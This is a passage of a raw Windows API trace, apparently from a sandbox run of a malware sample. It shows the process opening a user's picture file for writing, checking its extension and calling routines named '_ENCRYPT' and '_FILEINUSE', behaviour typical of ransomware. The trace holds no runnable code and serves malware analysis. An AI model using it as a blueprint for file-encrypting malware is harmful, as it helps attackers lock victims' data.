PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0188.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0188.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0188.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0188.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0188.833] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0188.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0188.834] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0188.834] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.834] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0188.834] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.834] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0188.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0188.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0188.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0188.834] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0188.834] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x2adb, lpOverlapped=0x0) returned 1 [0188.835] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0188.835] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x2adb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.835] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0188.835] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.835] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.835] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.835] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.835] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0188.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0188.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0188.835] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0188.835] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0188.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0188.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0188.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0188.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0188.836] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0188.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0188.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0188.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0188.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0188.836] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0188.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0188.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0188.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd558 [0188.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd558, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0188.836] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\6t126znrjjemieiaf23.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0188.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0188.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0188.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0188.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0188.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0188.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0188.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0188.838] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.838] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0188.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0188.838] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0188.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0188.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0188.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0188.839] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0188.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0188.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0188.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0188.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0188.839] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0188.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0188.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0188.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba4e0 [0188.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9ba4e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0188.839] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.839] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0188.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0188.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0188.840] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0188.840] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0188.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0188.840] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0188.840] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0188.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0188.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0188.840] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0188.840] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0188.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0188.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0188.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0188.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0188.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0188.840] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.840] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.840] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.840] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0188.840] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0188.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0188.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0188.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0188.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0188.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc0) returned 0x9c3540 [0188.841] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0188.841] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0188.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0188.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0188.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0188.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0188.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0188.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0188.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0188.841] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8590c70, ftCreationTime.dwHighDateTime=0x1d5dd57, ftLastAccessTime.dwLowDateTime=0x1dee4310, ftLastAccessTime.dwHighDateTime=0x1d5e18d, ftLastWriteTime.dwLowDateTime=0x1dee4310, ftLastWriteTime.dwHighDateTime=0x1d5e18d, nFileSizeHigh=0x0, nFileSizeLow=0x80da, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="6t126znRJjEMIeiAF23.bmp", cAlternateFileName="6T126Z~1.BMP")) returned 0x90add8 [0188.841] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0188.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0188.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0188.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0188.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0188.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0188.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0188.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0188.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0188.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0188.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0188.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0188.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0188.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0188.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0188.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0188.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0188.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0188.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0188.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0188.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0188.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0188.843] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0188.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0188.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0188.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0188.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0188.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0188.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0188.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0188.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0188.843] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8590c70, ftCreationTime.dwHighDateTime=0x1d5dd57, ftLastAccessTime.dwLowDateTime=0x1dee4310, ftLastAccessTime.dwHighDateTime=0x1d5e18d, ftLastWriteTime.dwLowDateTime=0x1dee4310, ftLastWriteTime.dwHighDateTime=0x1d5e18d, nFileSizeHigh=0x0, nFileSizeLow=0x80da, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="6t126znRJjEMIeiAF23.bmp", cAlternateFileName="6T126Z~1.BMP")) returned 0x90add8 [0188.843] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0188.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0188.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0188.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0188.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0188.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0188.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0188.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0188.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0188.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0188.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0188.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0188.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0188.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0188.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0188.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0188.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0188.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0188.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0188.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0188.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0188.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0188.844] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0188.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0188.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0188.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0188.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0188.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0188.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0188.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0188.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0188.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0188.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0188.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0188.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0188.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0188.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0188.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0188.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0188.845] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.845] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.845] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.845] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.845] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.845] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.845] CompareStringW (Locale=0x400, 